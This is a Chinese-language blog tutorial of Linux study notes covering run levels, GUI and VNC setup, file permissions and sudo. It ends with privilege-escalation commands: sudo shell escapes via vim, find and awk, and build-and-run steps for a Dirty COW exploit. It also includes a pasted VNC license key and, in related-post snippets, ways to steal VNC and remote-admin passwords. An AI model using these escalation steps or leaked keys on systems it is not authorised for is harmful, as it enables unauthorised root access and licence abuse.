【linux运行模式和提权】

于 2024-06-03 00:40:26 发布
阅读量509 收藏 9
点赞数 4
文章标签: linux 服务器 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itboy_szjj/article/details/139159281
版权

文章目录

学习目标

1.学会查看运行级别
2.学会安装linux的图形界面
3.学会安装VNC
4.学会不同权限的转换
5.学会sudo用法
6.学会sudo提权

1.linux的运行级别

运行级别0	关机
运行级别1	单用户
运行级别2	不带网络的多用户(多终端)
运行级别3	完整的多用户模式
运行级别4	保留
运行级别5	桌面模式
运行级别6	重启

#切换运行级别
init 0

#查看运行级别
systemctl get-default
#设置运行级别
systemctl set-default grapical.target	#设置默认运行级别为图形
systemctl set-default multi-user.target	#设置默认运行级别为命令行

切换终端alt+ F1/F2/F3
vnc viewer	客户端
华为终端盒子

01
02

1)安装linux的图形界面

1)安装linux系统的图形界面
03
2)重启调整内存和处理器
04
05
06
3)要出现以下界面要先创建一个普通用户bai就可以用root用户登录
07
08
09
10
11
12
13

#安装图形化界面
yum groups install "GNOME Desktop" -y
useradd linux

#切换linux运行级别
systemctl set-default graphical.target
reboot

#初始化设置图形界面
一路下一步执行

Linux终端(TTY)

2)安装VNC

vnc是一款很好用的远程控制软件,支持全平台,不管是linux系统、windowns系统
还是苹果系统,都支持VNC。

1.安装vnc server
14
15
16
17
18
去找一个有效的密钥
19
20
21
22
23
24
25
26
27
28
29
30
31

小结:
#安装图形化界面
yum groups install "GNOME Desktop" -y
useradd linux

#切换运行级别
systemctl set-default graphical.target
reboot

#初始化设置图形界面
接着一路下一步下一步的执行

#安装vnc-server远程控制linux桌面
yum localinstall VNC-Server-6.8.0-Linux-x64.rpm -y
vnclicense -add 84WFN-YRJ4C-WA44V-9BW6X-PAE2A

鼠标点击--应用程序--互联网--vnc server

#客户端连接
192.168.***.111:5900 或者
192.168.***.111:0

VNC客户端
Linux VNC server 安装配置

2.linux权限掩码

#修改文件vim /etc/profile
root	  默认权限掩码  022
普通用户  默认权限掩码   002

inode:存储除文件名以外的属性
block:存储文件的内容,目录的block存储,该目录下的文件名和它的inode编号

32
33
34
35
3637
38
以上是root用户的演示,下面演示普通用户的权限
39
40
41
42

3.linux特殊权限

suid	其他用户,拥有该文件属主的执行权限
sgid	其他用户,拥有该文件属组的执行权限
sticky	很多用户共同使用的目录,实现用户之间不能互相删除改变对方的文件权限

43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
linux-粘滞位的使用

4.Sudo用法

su == switch user
sudo == superuser do
sudo是常用的Linux系统命令,允许普通用户执行root命令.

1.配置/etc/sudoers
#用户名	    所有终端 = 运行的用户身份	  命令ALL
zhangsan	ALL=(ALL)	       /bin/systemctl,/usr/bin/vim 

2.使用sudo执行命令
#使用sudo来执行命令
sudo	systemctl stop network	#start,stop,restart

3.查看可以使用的授权命令
sudo -l

74
75
76
77
78
79
80
82
83

5.linux普通用户提权

Sudo提权
vim         #命令模式执行:!bash
find	    #sudo find . -exec bash \;
awk	        #sudo awk 'BEGIN {system("/bin/bash")}' 1.txt

84
85
86
87
88
89
90
91
92
93
94
95
96
97
awk sudo提权
98
Linux下利用sudo实现提权
99
linux sudo提权

6.脏牛提权

仓库地址:https://github.com/gbonacini/CVE-2016-5195

#使用git拉取代码
git clone https://gitee.com/xiaozhi1314_admin/CVE-2016-5195.git 
cd CVE-2016-5195/
make		       #编译
./dcow -s		   #提权

100
101
102
103
104
低版本的红帽存在脏牛提权漏洞。
Linux sudo提权-cve-2021-3156

总结

以上就是要讲的内容,本文介绍了linux的运行级别,如何安装linux的图形界面以及安装VNC,还有如何转换不同的权限和提权等等,涉及的知识点很多。

itboy_sz
关注
vnc提权
L_lemo004的博客
06-03 980
提权思路: 利用在安装VNC后会在注册表中保留VNC的密码,通过WEBSHELL远程读取HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 的密码 信息并在本地编辑破解VNC密码来达到提权目的。 通过读取注册表十进制数 转换成十六进制数 破解十六进制数得到密码 CMD输入 vncx4.exe -W 回车 输入转换后的十六进制数 使用获取到...
提权 - Linux(一)
最新发布
acepanhuan的博客
03-02 312
提权 - Linux(一)
如何利用VNC服务提升权限
蓝法典的专栏
03-23 3512
作者:小花很多时候大家提升权限一般用SERVU,或是找到sa帐户密码等。其实除了这个VNC一般也是以最高权限运行的,而且是图形界面,功能和远程终端类似。如果得到了一个主机的WEBSHELL,想提升权限,发现主机运行VNC服务,就可以考虑用下面的方法。默认情况下VNC服务端的密码是放在注册表中的,本文只针对这种情况。首先用ASP读出注册表中的加密密码,然后用破解工具破解。我给出大家一个读取VNC
Linux提权——SUDO
negnegil的博客
09-03 9292
使用Sudo权限提升Linux账户权限 在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图 Sudoer文件语法 假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入 test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
提权下---笔记
tell_me_404的博客
03-09 246
radmin提权 通过端口扫描 扫描4899端口 上传radmin.asp木马读取radmin的加密密文 使用工具连接 远程管理软件提权 pcanywhere 访问pcanywhere默认安装目录 下载用户配置文件 通过破解用户密码文件 一、Pcanywhere 1、上马------...
linux-- 提权
qq_43619461的博客
11-25 483
linux提权 vim /ect/sudoers 修改内容如下 root ALL=(ALL:ALL) ALL # 添加的用户 fly ALL=(ALL:ALL) ALL
Linux利用UDF库实现Mysql提权
09-10
Linux环境中,MySQL数据库系统允许用户通过UDF(User Defined Function)机制来扩展其功能,这意味着我们可以创建自己...在生产环境中,务必遵循最小权限原则,并定期更新和审计数据库系统,防止未经授权的提权行为。
Linux提权
qq_46258964的博客
01-07 1万+
Linux提权 Linux提权一般把提权脚本放置在/tmp目录下,临时文化,可读写执行。 有本地用户就本地提权,没有就msf提权Linux提权自动化脚本利用工具 信息收集工具:LinEnum, linuxprivchecker 漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2 提权方式如下 1,Linux SUID提权 suid可以让调用者以文件拥有者的身份运行该文件, 所以我们就利用suid提权的思路就是运行root用户所拥有的suid文件
Windows,Linux等系统提权工具
01-20
本文将详细介绍几种常见的用于Windows和Linux系统的提权工具及其使用方法。 ### 知识点二:Linux提权工具——Linux_Exploit_Suggester #### 工具介绍 Linux_Exploit_Suggester是一款用于Linux系统提权的工具,它...
Linux提权
qq_46527080的博客
02-25 865
Linux提权1.脏牛漏洞提权2.sudo提权-- CVE-2019-142873.Linux配置错误提权4.内核2.6本地提权5.suid提权 1.脏牛漏洞提权 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) exp: https://github.com/gbonacini/CVE-2016-5195 https://github.com/FireFart/dirtycow 实验环境是在bee-bug靶场中进行 首先我们进入这个bee-bug靶场 然
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1090
vulnhub-靶场--lampiao
Centos7安装vnc server
热门推荐
cc1969281777的博客
12-09 3万+
VNC SERVER 6.2.1版本亲测可用,有效期限从上到下依次递减。 VKUPN-MTHHC-UDHGS-UWD76-6N36A 77NVU-D9G5T-79ESS-V9Y6X-JMVGA URF4A-YZRVW-PEDAE-BLNK3-Y5DMA
Linux VNC-Server-6.2.0-Linux-x64.rpm
12-27
Linux VNC-Server-6.2.0-Linux-x64.rpm下载,64位版本
centos安装并配置VNC Server图形化程序
少年多少年的博客
05-29 1579
centos安装VNC Server图形化程序,VNC Server配置
linux安装了vnc服务器,Linux安装VNC服务及配置
weixin_31235909的博客
04-28 922
linux部署环境如果没有远程桌面,那就只有静默安装了,当然这有难度,不过有VNC很不错,远程桌面环境部署方便多了,环境还算清晰,速度不卡,部署平台完全没有问题,部署方式可以参考如下笔记:[root@solgle Desktop]# rpm -ivh VNC-Server-5.2.1-Linux-x64.rpmPreparing... ################...
CentOS7下部署vnc-server与win7安装vnc-viewer
aa819310的专栏
05-30 1047
1、下载 https://www.realvnc.com/en/connect/ 下点击 Downlaod菜单 选择VNC Server 之后选择linux 选择RPMx64(32位的选RPMx86) 下点击 Downlaod菜单 选择VNC viewer 之后选择windows 选择EXE x86x64 2、centOS7下安装VNC-Server #取得root权限 su root #找到防止VNC-Server安装包的位置 cd VNC-Server-xxx.RPM #rpm安装 [roo
Linux提权思路
qq_37027540的博客
08-22 340
提权思路 当我们已经获取目标机器的较低权限时,我们需要扩大战果来提升权限。 查看系统发行版本cat /etc/issue或者cat /etc/*-release,查看内核信息uname -a。根据版本信息使用searchsploit xxx来查询发行的内核版本是否存在内核溢出漏洞,如果存在漏洞可以直接利用漏洞代码来提升权限: * 上传漏洞代码,使用gcc xxx.c -o exploit...
linux提权思路
weixin_68210863的博客
11-01 868
分享九种linux提权思路
Linux数据库提权
赤赤三的博客
03-20 697
Linux系统内核漏洞提权:(常见的就是系统内核提权 | 脏牛提权 | suid提权) 原理: linux内核版本的分类 Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字 第一个组数字:目前发布的内核主版本。 第二个组数字:偶数表示稳定版本;奇数表示开发中版本。 第三个组数字:错误修补的次数。 思路(利用linux系统漏洞进行提权,首先搜索linux系统漏洞,然后去github搜索Debian 5对应
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值